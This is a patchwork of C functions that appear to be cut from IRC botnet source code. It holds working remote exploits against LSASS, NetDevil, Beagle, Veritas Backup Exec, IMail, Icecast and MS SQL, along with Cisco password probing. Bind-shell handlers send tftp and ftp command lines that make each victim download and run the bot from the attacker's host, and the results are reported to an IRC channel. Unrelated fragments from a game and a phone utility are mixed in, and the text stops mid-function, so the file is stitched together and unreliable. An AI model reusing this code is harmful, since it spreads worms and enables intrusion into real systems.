unsigned long GetSpeed(char *szHost) {
if(strlen(szHost) > MAXHOSTNAME) return 0;
unsigned long lBufSize=NUM_KILOBYTES*1024;
SOCKET sSock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
if ((ssin.sin_addr.s_addr = ResolveAddress(szHost)) == 0) return 0;
ssin.sin_port = fhtons(80);
if ((sSock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0;
if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return 0;
char *szBuf=new char[lBufSize+3];
srand(GetTickCount());
int iChar=(char)(rand() % 255);
memset(szBuf, 0, lBufSize+1 );
memset(szBuf, iChar, lBufSize );
unsigned long lStrLen=strlen(szBuf);
char *szPostReq=new char[lBufSize+1002];
sprintf(szPostReq, "POST / HTTP/1.0\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"\r\n",
szHost, lStrLen);
strcat(szPostReq, szBuf);
strcat(szPostReq, "\r\n");
lStrLen=strlen(szPostReq);
unsigned long lStartMS=GetTickCount();
for(unsigned long l=0; l<lStrLen; l+=1024) {
if(lStrLen-l < 1024) {
if(fsend(sSock, szPostReq+l, lStrLen-l,0) == SOCKET_ERROR) {
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return 0;
}
} else {
if(fsend(sSock, szPostReq+l, 1024,0) == SOCKET_ERROR) {
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return 0;
}
}
}
unsigned long lEndMS=GetTickCount();
float fElapsedS=(float)(lEndMS-lStartMS)/1000.0f;
if(fElapsedS==0.0f) fElapsedS=1.0f;
float fBytesPS=(float)lStrLen/fElapsedS;
float fKBytesPS=fBytesPS/1024.0f;
float fBitsPS=fBytesPS*8.0f;
float fKBitsPS=fBitsPS/1024.0f;
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return (unsigned long)fKBitsPS;
}
void TransferLoop(SOCKET tsock, SOCKET csock)
{
int len;
char buf[1024];
fd_set fd;
while (TRUE) {
FD_ZERO(&fd);
FD_SET(csock, &fd);
FD_SET(tsock, &fd);
memset(buf, 0, sizeof(buf));
fselect(0, &fd, NULL, NULL, NULL);
if(fFD_ISSET(csock, &fd)) {
if((len = frecv(csock,buf,sizeof(buf),0))== -1) break;
if(fsend(tsock,buf,len,0)== -1) break;
}
if (fFD_ISSET(tsock,&fd)) {
if((len = frecv(tsock,buf,sizeof(buf),0))== -1) break;
if(fsend(csock,buf,len,0)== -1) break;
}
}
return;
}
BOOL lsass(EXINFO exinfo)
{
int len;
SOCKET sockfd;
int dport = 44444;
struct sockaddr_in their_addr;
char recvbuf[1600];
{
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
/* ^ Server's address */
their_addr.sin_port = fhtons((unsigned short)exinfo.port);
/* connect to the server */
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)
return FALSE;
if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
switch (recvbuf[68]) {
case '1': // win XP
if (!Exploit2( exinfo, sockfd, 0 ))
return FALSE;
break;
case '0': //win 2k
if (!Exploit2( exinfo, sockfd, 2 ))
if (!Exploit2( exinfo, sockfd, 1))
return FALSE;
break;
default:
return FALSE;
}
}
return TRUE;
}
BOOL NetDevil(EXINFO exinfo)
{
char buffer[IRCLINE];
DWORD mode=0;
SOCKET ssock;
if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
return FALSE;
SOCKADDR_IN sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
sin.sin_port = fhtons(exinfo.port);
fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
fioctlsocket(ssock,FIONBIO,&mode);
for (int i=0; passwords[i]; i++) {
Sleep(50);
memset(buffer,0,sizeof(buffer));
if (NetDevil_Receive(ssock) == -1)
break;
if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0)
break;
if (strcmp(buffer,"passed") == 0) {
sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]);
fsend(ssock, buffer, strlen(buffer), 0);
if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
fclosesocket(ssock);
_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
break;
}
if (strcmp(buffer,"pass_pleaz") == 0) {
memset(buffer,0,sizeof(buffer));
sprintf(buffer,"pass_pleaz%s",passwords[i]);
fsend(ssock,buffer ,strlen(buffer), 0);
continue;
}
else break;
}
fclosesocket(ssock);
return FALSE;
}
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(bindport);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s &%s\r\n",
GetIP( exinfo.sock ),filename, filename);
#endif
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
int
main(int argc, char **argv)
{
char *string;
unsigned int size = 0, diff = 0, i;
int sock;
if(argc == 1) {
fprintf(stderr, "icx (2) ... proper version ... diz\n");
fprintf(stderr, "usage: %s <host> <icecast_port> [ <icecast_hostname> ]\n", argv[0]);
exit(1);
}
if(argc != 4)
diff = (strlen(ICECASTNAME)+strlen(argv[2]));
else
diff = (strlen(argv[3])+strlen(argv[2]));
size = (8198 - diff + 1);
string = malloc(size);
memset(string, 0x90, (size-8-strlen(bindcode)-1));
memcpy(string+(size-strlen(bindcode)-8-1), bindcode, strlen(bindcode));
*(long *)&string[size-9] = ONEHITWONDER;
*(long *)&string[size-5] = ONEHITWONDER;
string[size-1] = '\0';
if((sock = opensock(argv[1], atoi(argv[2]))) < 0 )
exit(1);
fsend(sock, "GET %s HTTP/1.0\n\n", string);
free(string);
close(sock);
// sploits need dots..everyone knows this...zzz
for(i = 0; i < SLEEP; i++) {
sleep(1);
fprintf(stderr, ".\n");
}
// check bindshell
if((sock = opensock(argv[1], 30464)) < 0 ) {
fprintf(stderr, "attack not succesfull\n");
exit(1);
}
fsend(sock, "%s\n", "id; uname -a");
handleshell(sock);
exit(0);
}
BOOL Cisco(EXINFO exinfo)
{
int ret,SocketFD;
char buffer1[64],buffer2[64];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
memset(buffer1, '\0', 64);
memset(buffer2, '\0', 64);
if ((ret = frecv(SocketFD, buffer1, 64, 0)) > 0)
{
ret = frecv(SocketFD, buffer1, 64, 0);
fsend(SocketFD,"cisco\r",6,0);
ret = frecv(SocketFD, buffer2, 64, 0);
if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40)))
{
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(telnet)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
}
}
return FALSE;
}
BOOL thcsql(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
unsigned int sock,rc;
struct sockaddr_in sqludp;
if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
return FALSE;
sqludp.sin_family=AF_INET;
sqludp.sin_addr.s_addr=finet_addr(exinfo.ip);
sqludp.sin_port=fhtons(exinfo.port);
if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR)
{
if(rc==0)
{
fsend(sock,badbuffer,sizeof(badbuffer)-1,0);
Sleep(1000);
if (ConnectShell(exinfo, 31337))
{
exploit[exinfo.exploit].stats++;
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
}
fshutdown(sock,1);
fclosesocket(sock);
return FALSE;
}
bool ConnectShell(EXINFO exinfo) {
int len;
struct sockaddr_in shell_addr;
char recvbuf[1024];
SOCKET sockfd;
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons((unsigned short)exinfo.port);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == -1 )
return false;
if (fconnect(sockfd, (struct sockaddr *)&shell_addr, sizeof(struct sockaddr)) == -1)
return false;
char mkdir_buff[400]="";
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\n"
"%s\n",
GetIP(exinfo.sock),filename, filename);
if (fsend(sockfd, mkdir_buff, sizeof(mkdir_buff)-1,0) == -1)
return false;
return true;
}
BOOL CiscoHTTP(EXINFO exinfo)
{
int ret,SocketFD;
char buffer[4096];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0)
return FALSE;
memset(buffer, 0, sizeof(buffer));
if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0)
return FALSE;
fclosesocket(SocketFD);
if(ret < 5)
return FALSE;
if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL)
return FALSE;
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
static void SessionReadShellThread(LPVOID param)
{
PSESSION_DATA Session = (PSESSION_DATA)param;
char Buffer[BUFFER_SIZE], Buffer2[BUFFER_SIZE+30];
DWORD BytesRead;
while (ReadFile(Session->ReadPipeHandle, Buffer, sizeof(Buffer), &BytesRead, NULL)) {
DWORD BufferCnt, BytesToWrite;
BYTE PrevChar = 0;
for (BufferCnt = 0, BytesToWrite = 0; BufferCnt < BytesRead; BufferCnt++) {
if (Buffer[BufferCnt] == '\n' && PrevChar != '\r')
Buffer2[BytesToWrite++] = '\r';
PrevChar = Buffer2[BytesToWrite++] = Buffer[BufferCnt];
assert(BytesToWrite < sizeof Buffer2);
}
if (fsend(Session->ClientSocket, Buffer2, BytesToWrite, 0) <= 0)
break;
}
if (GetLastError() != ERROR_BROKEN_PIPE)
addlogv("[RLOGIND]: SessionReadShellThread exited, error: <%ld>.", GetLastError());
return;
}
BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
BOOL success = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
fclosesocket(sSock);
fWSACleanup();
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return (success);
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons(xport);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n",
GetIP(exinfo.sock),FTP_PORT, filename, filename);
#endif
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
int IRC_ReceiveLoop(SOCKET sock, char *server, char *channel, char *chanpass, char *nick, int clone)
{
char buffer[4096], masters[MAXLOGINS][MAXIDENT], *lines[MAX_LINES], nickbuf[MAXNICKLEN], host[MAXHOSTNAME];
int i, numlines, repeat, in_channel=0;
for (i = 0; i < MAXLOGINS; i++)
masters[i][0] = '\0';
if (serverpass[0] != '\0')
irc_sendv(sock,"PASS %s\r\n",serverpass);
sprintf(buffer, "NICK %s\r\nUSER %s 0 0 :%s\r\n", nick, rndnick(nickbuf,LETTERNICK, FALSE), nick);
if (fsend(sock, buffer, strlen(buffer), 0) == SOCKET_ERROR) {
fclosesocket(sock);
Sleep(5000);
return 0;
}
while(1) {
memset(buffer, 0, sizeof(buffer));
if (frecv(sock, buffer, sizeof(buffer), 0) <= 0)
break;
// FIX ME: Truncation occurs here
numlines = Split(buffer,&lines);
for (i=0;i < numlines ;i++) {
repeat=1;
do {
#ifdef DEBUG_LOGGING
debuglog(lines[i]);
#endif
#ifdef DEBUG_CONSOLE
printf("%s\n",lines[i]);
#endif
if (lines[i] != NULL)
repeat = IRC_ProtocolParse(lines[i], sock, server, channel, chanpass, nick, host, masters, &in_channel, repeat, clone);
repeat--;
if (repeat > 0)
Sleep(FLOOD_DELAY);
} while (repeat > 0);
switch (repeat) {
case -1:
return 0; // Reconnect
case -2:
return 1; // Disconnect
case -3:
return 2; // Quit
default:
break;
}
}
}
return 0;
}
void execute_decay( event_data* event )
{
obj_data* obj = (obj_data*) event->owner;
obj->shown = 1;
fsend( *obj->array, "%s rots, and is quickly eaten by a grue.", obj );
obj->Extract( );
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(7777);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
DWORD WINAPI IdentThread(LPVOID param)
{
char user[12], buffer[IRCLINE];
int threadnum = (int)param;
BOOL success = FALSE;
SOCKET ssock,csock;
SOCKADDR_IN ssin, csin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)113);
ssin.sin_addr.s_addr=INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) {
threads[threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if (flisten(ssock, 5) != SOCKET_ERROR) {
int csin_len = sizeof(csin);
while (1) {
if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET)
break;
sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port);
addlog(buffer);
if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) {
Split(buffer,0);
memset(user, 0, sizeof(user));
_snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE));
if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR)
success = TRUE;
}
}
}
}
}
if (!success) {
sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError());
addlog(buffer);
}
fclosesocket(ssock);
fclosesocket(csock);
clearthread(threadnum);
ExitThread(0);
}
bool veritasbackupserver(EXINFO exinfo) {
SOCKET sock;
if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false;
SOCKADDR_IN sin;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = fhtons((unsigned short)exinfo.port);
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
memcpy(&talk[37], &v91sp0sp1, 4);
memcpy(&talk[72], &esisp0sp1, 4);
//os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";
strcpy(payload,veritassc);
if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false;
if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false;
Sleep(10);
for (int i=0; i < 7;i++) {
if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false;
Sleep(10);
}
Sleep(1000);
fclosesocket(sock);
ConnectShell(exinfo,101);
return (AddEx(exinfo,true));
}
/* getinfo - this should work on any modern HTC device */
void getinfo()
{
char *result;
zenity(15);
send("info 2");
get();
zenity(30);
result = parseHTCBlock();
if (strlen(result) != 0)
printf("[] CID: %s\n", result);
zenity(50);
send("getdevinfo");
get();
zenity(75);
result = parseHTCBlock();
if (strlen(result) != 0)
printf("[] ModelID: %s\n", result);
else {
authBL();
fsend("getdevinfo");
get();
result = parseHTCBlock();
zenity(85);
if (strlen(result) != 0)
printf("[] ModelID: %s\n", result);
else
printf("[!!] Your device can't be identified!\n");
fsend("ruurun 0");
fsend("ruurun 0");
get();
fsend("ResetDevice");
fsend("ResetDevice");
get();
}
zenity(100);
}
int check_os(char *host,unsigned short target_port, int *sp)
{
SOCKET sSock;
if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(host);
ssin.sin_port = fhtons((unsigned short)target_port);
if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) {
char recv_buff[5000];
memset(recv_buff,0,sizeof(recv_buff));
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(sSock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
fclosesocket(sSock);
*sp=atoi(&recv_buff[37]);
if (recv_buff[8] == 5 && recv_buff[12] == 0)
return ID_WIN2K;
else if (recv_buff[8] == 5 && recv_buff[12] == 1)
return ID_WINXP;
else if (recv_buff[8] == 5 && recv_buff[12] == 2)
return ID_WIN2K3;
else if (recv_buff[8] == 4)
return ID_WINNT;
else
return ID_UNKNOWN;
}
}
}
}
}
fclosesocket(sSock);
}
return 1;
}
int pipe_send(SOCKET sock,char *chan,char *buf)
{
char sendbuf[IRCLINE];
if (strcmp(chan, "") != 0) {
Sleep(FLOOD_DELAY);
sprintf(sendbuf,"PRIVMSG %s :%s\r",chan,buf);
} else
sprintf(sendbuf,"%s",buf);
if (fsend(sock,sendbuf,strlen(sendbuf),0) <= 0)
Close_Handles();
return 0;
}
BOOL WriteExact(SOCKET w_sock, char *buf, int bytes) {
if (bytes == 0) return FALSE;
int i = 0;
int j;
while (i < bytes) {
j = fsend(w_sock, buf+i, bytes-i, 0);
if (j == SOCKET_ERROR || j==0) return FALSE;
i += j;
}
return TRUE;
}
// part of the redirect function, handles sending/recieving for the local connection.
DWORD WINAPI RedirectLoop2Thread(LPVOID param)
{
REDIRECT redirect = *((REDIRECT *)param);
REDIRECT *redirectp = (REDIRECT *)param;
redirectp->cgotinfo = TRUE;
int threadnum=redirect.cthreadnum, err;
char buff[4096];
while (1) {
memset(buff, 0, sizeof(buff));
if ((err = frecv(threads[threadnum].csock, buff, sizeof(buff), 0)) <= 0) break;
if ((err = fsend(threads[threadnum].sock, buff, err, 0)) == SOCKET_ERROR) break;
}
fclosesocket(threads[threadnum].csock);
clearthread(threadnum);
ExitThread(0);
}
int NetDevil_Upload(char *IP, SOCKET ssock)
{
SOCKET nsock;
char buffer[1024], botfile[MAX_PATH], rFile[MAX_PATH];
int port = 0,bytes_sent = 0;
unsigned int Fsend = 1024, Fsize, move;
DWORD mode = 0;
BOOL ver15 = FALSE;
GetModuleFileName(NULL, botfile, sizeof(botfile));
fsend(ssock, "version", 7, 0);
memset(buffer,0,sizeof(buffer));
frecv(ssock, buffer, sizeof(buffer), 0);
if (strlen(buffer) > 5) {
buffer[strlen(buffer)-2] = '\0';
char *uPort = strrchr(buffer, '\n\r');
if (uPort != NULL)
port = atoi(uPort);
}
char *ver = strtok(buffer,"\n\r");
if (strcmp(buffer,"ver1.5") == 0)
ver15 = TRUE;
sprintf(rFile,"C:\\%s",filename);
port = ((port == 0)?(903):(port));
if ((nsock = CreateSock(IP,port)) == INVALID_SOCKET)
goto end;
HANDLE testfile;
if ((testfile = CreateFile(botfile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0)) == INVALID_HANDLE_VALUE)
goto end;
Fsize = GetFileSize(testfile,NULL);
if (ver15)
sprintf(buffer,"cmd[003]%s|%i|\n\r",rFile,Fsize);
else
sprintf(buffer,"%s\r1",rFile);
fsend(nsock, buffer, strlen(buffer), 0);
if (frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
while (Fsize) {
memset(buffer,0,sizeof(buffer));
if (Fsend>Fsize)
Fsend=Fsize;
move = 0-Fsize;
SetFilePointer(testfile, move, NULL, FILE_END);
ReadFile(testfile, buffer, Fsend, &mode, NULL);
bytes_sent = fsend(nsock, buffer, Fsend, 0);
if (bytes_sent == SOCKET_ERROR) {
if (fWSAGetLastError() != WSAEWOULDBLOCK)
goto end;
else
bytes_sent = 0;
}
Fsize = Fsize - bytes_sent;
if (!ver15 && frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
}
if (testfile != INVALID_HANDLE_VALUE)
CloseHandle(testfile);
fclosesocket(nsock);
Sleep(2000);
sprintf(buffer,"pleaz_run%s",rFile);
fsend(ssock, buffer,strlen(buffer), 0);
memset(buffer,0,sizeof(buffer));
if (frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
if (strcmp(buffer,"pleaz_run_done") != 0)
goto end;
Sleep(4000);
fclosesocket(ssock);
return 1;
end:;
fclosesocket(nsock);
fclosesocket(ssock);
return 0;
}
BOOL iMail( char *target, void* conn,EXINFO exinfo )
{
IRC* irc=(IRC*)conn;
char szBanner[512];//, szShellcode[512];
int iRemoteTarget;
int ibindsize=405;
SOCKET sSocket;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500);
SOCKADDR_IN sinSockAddrIn;
memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn));
sinSockAddrIn.sin_family = AF_INET;
sinSockAddrIn.sin_addr.s_addr = finet_addr(exinfo.ip);
sinSockAddrIn.sin_port = fhtons(exinfo.port);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500);
if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL)))
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500);
if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500);
if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500);
if (strstr(szBanner,"IMail 7.04"))
iRemoteTarget = 0;
else if (strstr(szBanner,"IMail 7.05"))
iRemoteTarget = 1;
else if (strstr(szBanner,"IMail 7.06"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.07"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.10"))
iRemoteTarget = 3;
else if (strstr(szBanner,"IMail 7.11"))
iRemoteTarget = 4;
else if (strstr(szBanner,"IMail 7.12"))
iRemoteTarget = 5;
else if (strstr(szBanner,"IMail 7.13"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.14"))
